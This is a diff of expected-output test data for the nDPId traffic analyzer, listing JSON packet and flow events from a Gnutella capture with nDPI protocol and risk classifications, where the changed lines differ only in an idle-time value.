-00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1104,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":2,"flow_last_seen":91074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91074,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA84AAEAGXEIOyP\/lCgACD5DCxHYAwlYBrXv\/HGAS\/\/8kxQAAAgQFtA=="} -00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1105,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":3,"flow_last_seen":91074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91074,"pkt":"UlQAEjUCCAAn5uVZCABFAAAotiFAAIAGKfIKAAIPDsj\/5cR2kMKte\/8cAMJWAlAQ+vBBkQAA"} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1106,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90740,"flow_last_seen":91075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91075,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":50294,"dst_port":37058,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1108,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":2,"flow_last_seen":91076,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91076,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA9AAAEAGXEAOyP\/lCgACD7KOxHkAw1ABv2bicWAS\/\/8TtQAAAgQFtA=="} -00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1110,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":3,"flow_last_seen":91076,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91076,"pkt":"UlQAEjUCCAAn5uVZCABFAAAotiNAAIAGKfAKAAIPDsj\/5cR5so6\/ZuJxAMNQAlAQ+vAwgQAA"} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1111,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90741,"flow_last_seen":91076,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91076,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":50297,"dst_port":45710,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1185,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":2,"flow_last_seen":91716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":91716,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0QYNAAIAGx74KAAIPYteCnMRvMHWjnzXtAAAAAIAC+vC0KwAAAgQFtAEDAwgBAQQC"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1186,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":2,"flow_last_seen":91717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":91717,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0QNNAAIAG5KUKAAIPVHZ0xsRurkgo6JHMAAAAAIAC+vBxaAAAAgQFtAEDAwgBAQQC"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1197,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":2,"flow_last_seen":92750,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":92750,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0nYJAAIAGGXYKAAIPSsPs+cRxSH3g2g3bAAAAAIAC+vA0rwAAAgQFtAEDAwgBAQQC"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1199,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":2,"flow_last_seen":92750,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":92750,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0AqVAAIAGaH0KAAIPTHc3HMRwT3sv+xA+AAAAAIAC+vCQWAAAAgQFtAEDAwgBAQQC"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1203,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":3,"flow_last_seen":93622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":93622,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0KplAAIAGI1wKAAIP2qTGG8Rf6yo8NHW4AAAAAIAC+vBl2QAAAgQFtAEDAwgBAQQC"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1204,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":3,"flow_last_seen":93622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":93622,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0y5RAAIAGmKYKAAIPchsYX8ReLKPFX+7aAAAAAIAC+vA4WgAAAgQFtAEDAwgBAQQC"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1088,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":2,"flow_last_seen":91051,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91051,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA8YAAEAGMiyVHKOvCgACD8MkxIcAvm4BvtmXiWAS\/\/8GbQAAAgQFtA=="} +00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1089,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":3,"flow_last_seen":91052,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91052,"pkt":"UlQAEjUCCAAn5uVZCABFAAAozKZAAIAG6U4KAAIPlRyjr8SHwyS+2ZeJAL5uAlAQ+vAjOQAA"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1090,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":2,"flow_last_seen":91057,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91057,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA8cAAEAG2CXL3Mb0CgACDwSqxHsAv2gBodiVp2AS\/\/+P0AAAAgQFtA=="} +00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":3,"flow_last_seen":91057,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91057,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoTH9AAIAGD3EKAAIPy9zG9MR7BKqh2JWnAL9oAlAQ+vCsnAAA"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1092,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":2,"flow_last_seen":91058,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91058,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA8gAAEAG\/LTc7pFSCgACD4L3xIIAwGIBECov1GAS\/\/8zjQAAAgQFtA=="} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1093,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":91058,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91058,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"149.28.163.175","src_port":50311,"dst_port":49956,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1094,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":3,"flow_last_seen":91058,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91058,"pkt":"UlQAEjUCCAAn5uVZCABFAAAouGtAAIAGyBQKAAIP3O6RUsSCgvcQKi\/UAMBiAlAQ+vBQWQAA"} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90744,"flow_last_seen":91058,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91058,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"220.238.145.82","src_port":50306,"dst_port":33527,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1098,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90742,"flow_last_seen":91059,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91059,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.198.244","src_port":50299,"dst_port":1194,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1100,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":2,"flow_last_seen":91062,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91062,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA8wAAEAG\/T488TDCCgACD1M1xIUAwVwBVNBhD2AS\/\/\/z9wAAAgQFtA=="} +00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1101,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":3,"flow_last_seen":91062,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91062,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoxU5AAIAGu78KAAIPPPEwwsSFUzVU0GEPAMFcAlAQ+vAQxAAA"} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1102,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":91062,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":91062,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":50309,"dst_port":21301,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1104,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":2,"flow_last_seen":91074,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91074,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA84AAEAGXEIOyP\/lCgACD5DCxHYAwlYBrXv\/HGAS\/\/8kxQAAAgQFtA=="} +00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1105,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":3,"flow_last_seen":91074,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91074,"pkt":"UlQAEjUCCAAn5uVZCABFAAAotiFAAIAGKfIKAAIPDsj\/5cR2kMKte\/8cAMJWAlAQ+vBBkQAA"} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1106,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90740,"flow_last_seen":91075,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91075,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":50294,"dst_port":37058,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1108,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":2,"flow_last_seen":91076,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91076,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA9AAAEAGXEAOyP\/lCgACD7KOxHkAw1ABv2bicWAS\/\/8TtQAAAgQFtA=="} +00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1110,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":3,"flow_last_seen":91076,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91076,"pkt":"UlQAEjUCCAAn5uVZCABFAAAotiNAAIAGKfAKAAIPDsj\/5cR5so6\/ZuJxAMNQAlAQ+vAwgQAA"} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1111,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90741,"flow_last_seen":91076,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91076,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":50297,"dst_port":45710,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1185,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":2,"flow_last_seen":91716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":91716,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0QYNAAIAGx74KAAIPYteCnMRvMHWjnzXtAAAAAIAC+vC0KwAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1186,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":2,"flow_last_seen":91717,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":91717,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0QNNAAIAG5KUKAAIPVHZ0xsRurkgo6JHMAAAAAIAC+vBxaAAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1197,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":2,"flow_last_seen":92750,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":92750,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0nYJAAIAGGXYKAAIPSsPs+cRxSH3g2g3bAAAAAIAC+vA0rwAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1199,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":2,"flow_last_seen":92750,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":92750,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0AqVAAIAGaH0KAAIPTHc3HMRwT3sv+xA+AAAAAIAC+vCQWAAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1203,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":3,"flow_last_seen":93622,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":93622,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0KplAAIAGI1wKAAIP2qTGG8Rf6yo8NHW4AAAAAIAC+vBl2QAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1204,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":3,"flow_last_seen":93622,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":93622,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0y5RAAIAGmKYKAAIPchsYX8ReLKPFX+7aAAAAAIAC+vA4WgAAAgQFtAEDAwgBAQQC"} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1206,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":93713,"flow_last_seen":93713,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":93713,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.168.175.31","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1206,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":1,"flow_last_seen":93713,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":93713,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Ab0AAIARJSYKAAIPWKivH3AJGMoAIAKXR05EED7+AQFUC1FLUlAGUk5BXS\/iNQlw"} 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1207,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":93714,"flow_last_seen":93714,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":93714,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"41.249.63.200","src_port":28681,"dst_port":22582,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1207,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":1,"flow_last_seen":93714,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":93714,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0J3cAAIARnXIKAAIPKfk\/yHAJWDYAIGEwR05EED7\/AQFUC1FLUlAGUk5BXS\/iNQlw"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1208,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":2,"flow_last_seen":93763,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":93763,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0GYxAAIAGqNsKAAIPXwrNQ8R0LVPIsf8hAAAAAIAC+vCCJwAAAgQFtAEDAwgBAQQC"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1209,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":297,"flow_packet_id":2,"flow_last_seen":93763,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":93763,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0AsBAAIAGpi8KAAIP1eVv4MSREwzLMAmEAAAAAIAC+vB1+AAAAgQFtAEDAwgBAQQC"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1210,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":2,"flow_last_seen":93763,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":93763,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Rs1AAIAGRA4KAAIPyAeb0sRzbs28TEPZAAAAAIAC+vDQzwAAAgQFtAEDAwgBAQQC"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1212,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":2,"flow_last_seen":93763,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":93763,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0MiVAAIAGHAgKAAIPXjZCUsSB+JU5M3UyAAAAAIAC+vBcCwAAAgQFtAEDAwgBAQQC"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1213,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":2,"flow_last_seen":93763,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":93763,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0gg5AAIAGKkUKAAIPSVn5CMRyxdmnmnGXAAAAAIAC+vCCMAAAAgQFtAEDAwgBAQQC"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1214,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":2,"flow_last_seen":93763,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":93763,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0O4JAAIAGzRMKAAIPTG6ZscSGnFbyaQhuAAAAAIAC+vAmPAAAAgQFtAEDAwgBAQQC"} -00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1215,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":3,"flow_last_seen":94638,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":94638,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0AtlAAIAGwDcKAAIPGLMS8sRhuOFovA6\/AAAAAIAC+vBHrQAAAgQFtAEDAwgBAQQC"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1216,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":3,"flow_last_seen":94638,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":94638,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0UClAAIAGv8gKAAIPenVkTsRjIzKhF7fWAAAAAIAC+vBIyQAAAgQFtAEDAwgBAQQC"} 